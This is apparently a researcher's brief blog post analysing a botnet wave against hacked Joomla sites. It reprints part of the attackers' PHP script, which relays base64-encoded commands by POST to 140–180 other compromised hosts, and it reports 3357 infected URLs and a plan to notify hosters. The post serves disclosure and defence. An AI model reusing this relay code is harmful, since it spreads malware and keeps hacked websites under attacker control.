03.22
In the last Days, the BroBot Runners runs a new Wave with and send POST-Requests with c_id to the hacked Sites.
The Data (base64_encoded) has the following Skript/Data:
The Script calls in each Post-Request 140 to 180 others hacked URLs:
....
function send($target){
forkill();
if(strpos($target,$_SERVER["SERVER_NAME"]) !== false){
global $code;
} else{
$code = $_REQUEST["c_id"];
}
if(!preg_match("/http/i",$target))
$target = "http://$target";
$parts = @parse_url($target);
$host = $parts["host"];
$path = $parts["path"];
if($path=="")$path="/";
$data = @http_build_query(array("c_id" => $code ,'gnu[]' => 'base64_decode', "fr" => $_REQUEST["fr"], "ksess" => $_REQUEST["ksess"]));
$request = "POST $path HTTP/1.1\r\n"
."Host: $host\r\n"
."User-Agent: Mozilla/5.0 Firefox/3.6.12\r\n"
."Accept: */*\r\n"
."Accept-Language: en-us,en;q=0.5\r\n"
."Accept-Encoding: deflate\r\n"
."Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
."Content-type: application/x-www-form-urlencoded\r\n"
."Content-Length: ".strlen($data)."\r\n"
."Connection: Close\r\n"
."Cache-Control: no-cache\r\n\r\n{$data}";
forkill();
$fp = @fsockopen($host, 80);
@stream_set_timeout($fp, 3000);
@fwrite($fp, $request);
@stream_set_blocking($fp, 0);
return $fp;
}
if((isset($_REQUEST["rf"]) && $_REQUEST["rf"] == 1) || $_REQUEST["fr"] == 1){
echo @implode("", @file(writabledir()."/res"."2eb7e37x28e"));
@unlink(writabledir()."/res"."2ebx839d1fb28e");
flush();
}
$fn = lock();
....
We have found currently 3357 URLs with hacked Joomlas/Sites.
Over 2.500 Script/URLs are online. In the next days, we look to report the Site to Bank of America or directly to the Hoster to check and fix the site.
We will analysed in the next Days the complete PHP-Code and write a little bit what is not good and can be make better 🙂
If you want to get the complete code, please contact us.